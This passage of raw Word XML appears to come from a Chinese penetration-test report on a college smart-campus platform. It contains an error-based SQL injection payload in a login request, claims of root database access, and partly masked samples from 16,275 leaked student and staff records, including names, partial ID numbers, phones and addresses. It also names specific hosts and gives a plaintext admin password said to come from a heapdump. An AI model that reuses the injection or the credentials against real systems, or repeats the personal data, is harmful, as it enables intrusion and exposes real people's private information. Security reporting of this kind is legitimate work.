          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Connection: close</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>{"clientId":"e5cd7e4891bf95d1d19206ce24a7b32e","grantType":"password","tenantId":"000000' AND extractvalue(1,concat(0x7e,(SELECT version()))) AND '1'='1","username":"zzq001","password":"ttt","code":"","uuid":""}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="74" w:name="u709ede11"/>
    <w:bookmarkStart w:id="75" w:name="uf8bdab69"/>
    <w:bookmarkEnd w:id="73"/>
    <w:p w14:paraId="404AB0C7">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="640"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5841365" cy="3446145"/>
            <wp:effectExtent l="0" t="0" r="635" b="8255"/>
            <wp:docPr id="1030" name="图片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图片 7"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6" cstate="print"/>
                    <a:srcRect l="0" t="0" r="0" b="0"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="0">
                      <a:off x="0" y="0"/>
                      <a:ext cx="5841365" cy="3446145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:bookmarkStart w:id="76" w:name="u406ed269"/>
    <w:bookmarkEnd w:id="75"/>
    <w:p w14:paraId="0C6C8F7A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>证明为dba权限，是super用户，current_user为root</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="77" w:name="u6f0e3416"/>
    <w:bookmarkStart w:id="78" w:name="u553fd1ff"/>
    <w:bookmarkEnd w:id="76"/>
    <w:p w14:paraId="3BC8E2E2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="640"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5841365" cy="3423285"/>
            <wp:effectExtent l="0" t="0" r="635" b="5715"/>
            <wp:docPr id="1031" name="图片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图片 8"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7" cstate="print"/>
                    <a:srcRect l="0" t="0" r="0" b="0"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="0">
                      <a:off x="0" y="0"/>
                      <a:ext cx="5841365" cy="3423285"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:bookmarkStart w:id="79" w:name="ua8f29d90"/>
    <w:bookmarkEnd w:id="78"/>
    <w:p w14:paraId="24B4CE59">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>泄漏全校学生和教职工敏感数据15922+353=16275条</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="80" w:name="u9378efbf"/>
    <w:bookmarkStart w:id="81" w:name="u7b3cdcf0"/>
    <w:bookmarkEnd w:id="79"/>
    <w:p w14:paraId="475CE26E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="640"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5842000" cy="3493134"/>
            <wp:effectExtent l="0" t="0" r="0" b="12065"/>
            <wp:docPr id="1032" name="图片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图片 9"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8" cstate="print"/>
                    <a:srcRect l="0" t="0" r="0" b="0"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="0">
                      <a:off x="0" y="0"/>
                      <a:ext cx="5842000" cy="3493134"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:bookmarkStart w:id="82" w:name="ude844cbe"/>
    <w:bookmarkStart w:id="83" w:name="BvPh6"/>
    <w:bookmarkEnd w:id="81"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="0" w:type="dxa"/>
        <w:tblInd w:w="115" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="cccccc"/>
          <w:left w:val="single" w:sz="8" w:space="0" w:color="cccccc"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="cccccc"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="cccccc"/>
        </w:tblBorders>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1321"/>
        <w:gridCol w:w="2556"/>
        <w:gridCol w:w="1551"/>
        <w:gridCol w:w="3078"/>
      </w:tblGrid>
      <w:tr w14:paraId="3660515E">
        <w:trPr>
          <w:trHeight w:val="495" w:hRule="atLeast"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="313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51677558">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="482"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>数据类别</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="84" w:name="u861c4c6e"/>
          <w:bookmarkEnd w:id="82"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2917"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090D9394">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="482"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>表</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="85" w:name="u931c4581"/>
          <w:bookmarkEnd w:id="84"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="220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68E349BD">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="482"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>条数</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="86" w:name="uc2193cee"/>
          <w:bookmarkEnd w:id="85"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="537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290C19B">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="482"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>已验证的最小样本</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="86"/>
        </w:tc>
      </w:tr>
      <w:bookmarkStart w:id="87" w:name="u6b327c2a"/>
      <w:tr w14:paraId="08BA9654">
        <w:tblPrEx/>
        <w:trPr>
          <w:trHeight w:val="495" w:hRule="atLeast"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="313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81E58F1">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="482"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>在校学生学籍</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="88" w:name="uc39f2eb7"/>
          <w:bookmarkEnd w:id="87"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2917"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F46EE91">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="480"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="a03030"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>xg_student_msg</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="89" w:name="u391c6a6c"/>
          <w:bookmarkEnd w:id="88"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="220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4F3B026C">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="480"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>15922</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="90" w:name="u19e4bdfd"/>
          <w:bookmarkEnd w:id="89"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="537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25D8C998">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="480"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>姓名</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="a03030"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>陈一乔</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>、学号</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="a03030"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>08</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="a03030"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>、身份证</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="a03030"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>339005</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="a03030"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>6519</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>、手机</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="a03030"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>138</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="a03030"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>412</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>、住址</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="a03030"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>浙江杭州市萧山</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>、智能控制学院 / 电气101</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="90"/>
        </w:tc>
      </w:tr>
      <w:bookmarkStart w:id="91" w:name="u05d70585"/>
      <w:tr w14:paraId="3BB03C6E">
        <w:tblPrEx/>
        <w:trPr>
          <w:trHeight w:val="495" w:hRule="atLeast"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="313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7925BA47">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="482"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>教职工名册</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="92" w:name="u07feb4f1"/>
          <w:bookmarkEnd w:id="91"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2917"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768249D">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="480"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="a03030"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>rs_staff_info</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="93" w:name="u102ec721"/>
          <w:bookmarkEnd w:id="92"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205"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31516763">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="480"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>353（353 条含姓名+手机）</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="94" w:name="u7ff690c8"/>
          <w:bookmarkEnd w:id="93"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5376" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="eeeeee"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="eeeeee"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="eeeeee"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="eeeeee"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="15" w:type="dxa"/>
              <w:left w:w="15" w:type="dxa"/>
              <w:bottom w:w="15" w:type="dxa"/>
              <w:right w:w="15" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1AF81E54">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="480"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>丁咏梅 / 000001 / 临安校区综合办 / 130</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>79</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="94"/>
        </w:tc>
      </w:tr>
      <w:bookmarkStart w:id="95" w:name="Rlkqq"/>
      <w:bookmarkEnd w:id="83"/>
    </w:tbl>
    <w:p w14:paraId="730B1F79">
      <w:pPr>
        <w:pStyle w:val="style1"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="640"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>成果4 智慧校园管理员</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="96" w:name="uc8453d06"/>
    <w:bookmarkEnd w:id="95"/>
    <w:p w14:paraId="0CC36B28">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>http://web.hzdyjsxy.cn:18080/index</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="97" w:name="uaa80fcca"/>
    <w:bookmarkEnd w:id="96"/>
    <w:p w14:paraId="3FF29D4C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>数据库中获取js01管理员用户，使用heapdump泄漏的密码进入后台</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="98" w:name="uc2280a27"/>
    <w:bookmarkEnd w:id="97"/>
    <w:p w14:paraId="59893630">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>js01/Hzdyjs123456!@#</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="99" w:name="ue703fd2e"/>
    <w:bookmarkStart w:id="100" w:name="u77dd2099"/>
    <w:bookmarkEnd w:id="98"/>
    <w:p w14:paraId="7FF0B782">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="640"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5842000" cy="3054985"/>
            <wp:effectExtent l="0" t="0" r="0" b="18415"/>
            <wp:docPr id="1033" name="图片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图片 10"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9" cstate="print"/>
                    <a:srcRect l="0" t="0" r="0" b="0"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="0">
                      <a:off x="0" y="0"/>
                      <a:ext cx="5842000" cy="3054985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:bookmarkStart w:id="101" w:name="v3Jek"/>
    <w:bookmarkEnd w:id="100"/>
    <w:p w14:paraId="50BD01E4">
      <w:pPr>
        <w:pStyle w:val="style1"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="640"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>成果5 智慧校园移动端管理员</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="102" w:name="uba23bf92"/>
    <w:bookmarkEnd w:id="101"/>
    <w:p w14:paraId="7DFE77D8">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>http://m.hzdyjsxy.cn:18080/#/</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="103" w:name="ub12f7dc4"/>
    <w:bookmarkEnd w:id="102"/>
    <w:p w14:paraId="26488884">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>数据库中获取js01管理员用户，使用heapdump泄漏的密码进入后台</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="104" w:name="u323dfa3d"/>
    <w:bookmarkEnd w:id="103"/>
    <w:p w14:paraId="47A9EAEC">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>js01/Hzdyjs123456!@#</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="105" w:name="u994d60df"/>
    <w:bookmarkStart w:id="106" w:name="uc988c713"/>
    <w:bookmarkEnd w:id="104"/>
    <w:p w14:paraId="5CA637B3">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="640"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5842000" cy="3131185"/>
            <wp:effectExtent l="0" t="0" r="0" b="18415"/>
            <wp:docPr id="1034" name="图片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图片 11"/>
                    <pic:cNvPicPr/>
